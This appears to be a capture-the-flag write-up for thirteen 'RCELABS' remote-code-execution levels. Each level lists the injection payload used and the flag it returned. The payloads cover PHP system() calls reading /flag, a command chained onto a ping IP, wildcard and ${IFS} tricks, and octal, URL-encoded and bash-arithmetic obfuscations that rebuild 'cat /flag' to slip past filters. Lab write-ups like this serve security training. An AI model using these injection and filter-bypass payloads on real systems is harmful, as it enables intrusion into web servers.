RCELABS-0

image-20250629132135413

flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna}

RCELABS-1

a=system("tac /flag");

image-20250629132325220

flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a}

RCELABS-2

GET:action=submit
POST:content=system("cat /flag")

image-20250629133757765

flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5}

RCELABS-3

a=cat /flag

image-20250629133936854

flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c}

RCELABS-4

ip=127.0.0.1;cat /flag

image-20250629134134473

flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko}

RCELABS-5

cmd=cat /f*

image-20250629134257538

flag{pckbtoa8-nixs-4u8-8wry-u6uhcdge6l76}

RCELABS-6

cmd=/???/????64 /??a?

image-20250629134622192

flag{01jdj0do-ietg-4xv-8sdo-muicwrnwc4f0}

RCELABS-7

cmd=cat${IFS}/f*

image-20250629134757806

flag{3j2evhll-s3fi-4qg-8kz3-u1cibu6ryw9f}

RCELABS-8

cmd=cat /f*;1

image-20250629134928984

flag{ztstll1g-10zh-4uy-8w1t-0excqw9mjnad}

RCELABS-9

cmd=$'\143\141\164' $'\057\146\154\141\147'

image-20250629135352573

flag{cfq2rapl-4yfd-46z-8ph6-k51ni86icqx6}

RCELABS-10

cmd=%240%3C%3C%3C%240%5C%3C%5C%3C%5C%3C%5C%24%5C'%5C%5C%24((%24((1%3C%3C1))%2310001111))%5C%5C%24((%24((1%3C%3C1))%2310001101))%5C%5C%24((%24((1%3C%3C1))%2310100100))%5C%5C%24((%24((1%3C%3C1))%23101000))%5C%5C%24((%24((1%3C%3C1))%23111001))%5C%5C%24((%24((1%3C%3C1))%2310010010))%5C%5C%24((%24((1%3C%3C1))%2310011010))%5C%5C%24((%24((1%3C%3C1))%2310001101))%5C%5C%24((%24((1%3C%3C1))%2310010011))%5C'

注意由于有#,要url编码一次

image-20250629140943415

flag{q7cntwmd-y9ud-4b7-8ht7-4derkqneyiyq}

RCELABS-11

思路同上,用${##}来替换1

cmd=$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\'

image-20250629141214383

flag{dlgu8dkz-6eib-4ea-8uyg-yiyors5xzfaq}

RCELABS-12

思路同上,但是少了0

如果a=0,b=1,c=2,那么 ${!a} 就相当于 $0 , ${!b} 就相当于 $1 , ${!c} 就相当于 $2 
bash-5.1# a=0
bash-5.1# echo ${!a}
bash
${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\'

image-20250629141327128

flag{ytscxxhg-xs12-42w-8t6v-vqivwbuwrlzv}